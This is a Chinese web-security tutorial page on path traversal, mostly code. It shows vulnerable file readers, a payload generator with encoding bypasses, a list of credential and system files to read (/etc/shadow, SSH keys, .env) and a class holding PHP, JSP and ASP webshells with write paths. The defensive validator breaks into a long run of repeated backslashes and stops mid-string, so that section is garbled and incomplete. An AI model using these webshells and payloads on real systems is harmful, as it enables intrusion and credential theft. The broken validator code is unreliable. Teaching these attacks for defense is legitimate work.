元素码农
基础
UML建模
数据结构
算法
设计模式
网络
TCP/IP协议
HTTPS安全机制
WebSocket实时通信
数据库
sqlite
postgresql
clickhouse
后端
rust
go
java
php
mysql
redis
mongodb
etcd
nats
zincsearch
前端
浏览器
javascript
typescript
vue3
react
游戏
unity
unreal
C++
C#
Lua
App
android
ios
flutter
react-native
安全
Web安全
测试
软件测试
自动化测试 - Playwright
人工智能
Python
langChain
langGraph
运维
linux
docker
工具
git
svn
🌞
🌙
目录
▶
注入攻击与防御
SQL注入原理与利用
SQL注入防御策略
NoSQL注入技术分析
命令注入漏洞实战
ORM框架注入问题
注入攻击自动化检测
▶
认证与会话安全
会话固定与会话劫持
密码存储与加密策略
多因素认证机制
OAuth2.0安全实践
JWT安全攻防
认证逻辑漏洞挖掘
▶
XSS攻击与防御
XSS攻击原理与分类
存储型XSS实战案例
DOM型XSS高级利用
XSS过滤器绕过技术
CSP内容安全策略
前端框架XSS防护
▶
CSRF与点击劫持
CSRF攻击原理演示
CSRF Token防御实践
点击劫持技术剖析
SameSite Cookie策略
框架内置防护机制
跨域资源安全策略
▶
文件安全攻防
文件上传漏洞利用
安全文件类型验证
路径遍历漏洞实战
文件包含漏洞防御
Office文档攻击解析
云存储安全配置
▶
其他Web攻击技术
SSRF漏洞利用与防御
XXE漏洞攻防实战
反序列化漏洞原理
业务逻辑漏洞挖掘
HTTP请求走私攻击
Web缓存投毒攻击
发布时间:
2025-03-23 13:26
↑
☰
# 路径遍历漏洞实战 ## 漏洞原理 路径遍历(Path Traversal)漏洞是一种常见的Web安全漏洞,攻击者可以通过操纵文件路径来访问服务器上的任意文件。本文将详细介绍路径遍历漏洞的原理、攻击方式和防护措施。 ## 漏洞类型 ### 1. 基本路径遍历 ```javascript // 不安全的文件读取 function readFile(filename) { const basePath = '/var/www/uploads/'; const filePath = basePath + filename; // 直接拼接路径,没有任何验证 return fs.readFileSync(filePath); } // 攻击者可以使用 ../../../etc/passwd // 来读取系统敏感文件 ``` ### 2. 编码绕过 ```python # 不完整的路径验证 def get_file(filename): # 仅检查是否包含 ../ if '../' in filename: return 'Invalid filename' path = os.path.join('/var/www/files', filename) return open(path).read() # 攻击者可以使用以下方式绕过: # %2e%2e%2f = ../ # ..%2f = ../ # %2e%2e/ = ../ ``` ### 3. 规范化绕过 ```php // 不安全的路径验证 function getImage($filename) { $path = realpath('/images/' . $filename); if (strpos($path, '/images/') === 0) { return file_get_contents($path); } return false; } // 攻击者可以使用符号链接或 // 特殊字符序列绕过验证 ``` ## 攻击技术 ### 1. 目录遍历 ```javascript // 目录遍历工具 class DirectoryTraversal { constructor() { this.payloads = [ '../', '..\\', '%2e%2e%2f', '..;/', '.../', '.../' ]; this.targets = [ 'etc/passwd', 'etc/shadow', 'windows/win.ini', 'boot.ini' ]; } // 生成攻击路径 generatePaths(depth = 3) { const paths = []; for (const payload of this.payloads) { for (const target of this.targets) { // 生成不同深度的路径 let path = ''; for (let i = 0; i < depth; i++) { path += payload; } paths.push(path + target); } } return paths; } // 编码路径 encodePath(path) { return path .split('') .map(c => '%' + c.charCodeAt(0).toString(16)) .join(''); } // 双重编码路径 doubleEncodePath(path) { return this.encodePath(this.encodePath(path)); } } ``` ### 2. 文件读取 ```python # 文件读取工具 class FileReader: def __init__(self): self.sensitive_files = { 'unix': [ '/etc/passwd', '/etc/shadow', '/etc/hosts', '~/.bash_history', '~/.ssh/id_rsa' ], 'windows': [ 'c:\\boot.ini', 'c:\\windows\\system32\\drivers\\etc\\hosts', 'c:\\windows\\repair\\sam', 'c:\\windows\\php.ini', 'c:\\windows\\my.ini' ], 'web': [ 'config.php', '.env', 'wp-config.php', 'web.config', 'database.yml' ] } def generate_payloads(self, file_type): if file_type not in self.sensitive_files: return [] payloads = [] files = self.sensitive_files[file_type] # 生成不同形式的路径 for file in files: payloads.extend([ file, self.normalize_path(file), self.encode_path(file), self.double_encode_path(file) ]) return payloads def normalize_path(self, path): # 转换路径分隔符 return path.replace('\\', '/') def encode_path(self, path): # URL编码路径 return urllib.parse.quote(path) def double_encode_path(self, path): # 双重URL编码 return urllib.parse.quote( urllib.parse.quote(path) ) ``` ### 3. 文件写入 ```java // 文件写入利用 public class FileWriter { private Map<String, String> webshells; public FileWriter() { webshells = new HashMap<>(); // PHP webshell webshells.put( "php", "<?php system($_GET['cmd']); ?>" ); // JSP webshell webshells.put( "jsp", "<% Runtime.getRuntime().exec( request.getParameter(\"cmd\") ); %>" ); // ASP webshell webshells.put( "asp", "<% Set rs = CreateObject( \"WScript.Shell\" ) rs.Run(Request(\"cmd\")) %>" ); } // 生成写入路径 public List<String> generatePaths( String webroot, String type ) { List<String> paths = new ArrayList<>(); // 常见Web目录 String[] dirs = { "images", "uploads", "temp", "assets", "public" }; // 遍历目录生成路径 for (String dir : dirs) { paths.add(String.format( "%s/%s/shell.%s", webroot, dir, type )); // 添加路径遍历 paths.add(String.format( "%s/%s/../shell.%s", webroot, dir, type )); } return paths; } // 获取webshell内容 public String getWebshell(String type) { return webshells.getOrDefault( type.toLowerCase(), "" ); } } ``` ## 防护措施 ### 1. 路径验证 ```javascript // 路径验证器 class PathValidator { constructor() { this.config = { // 允许的根目录 basePath: '/var/www/uploads', // 允许的文件类型 allowedExts: new Set([ 'jpg', 'png', 'gif', 'pdf' ]), // 禁止的路径模式 blacklist: [ '../', '..\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
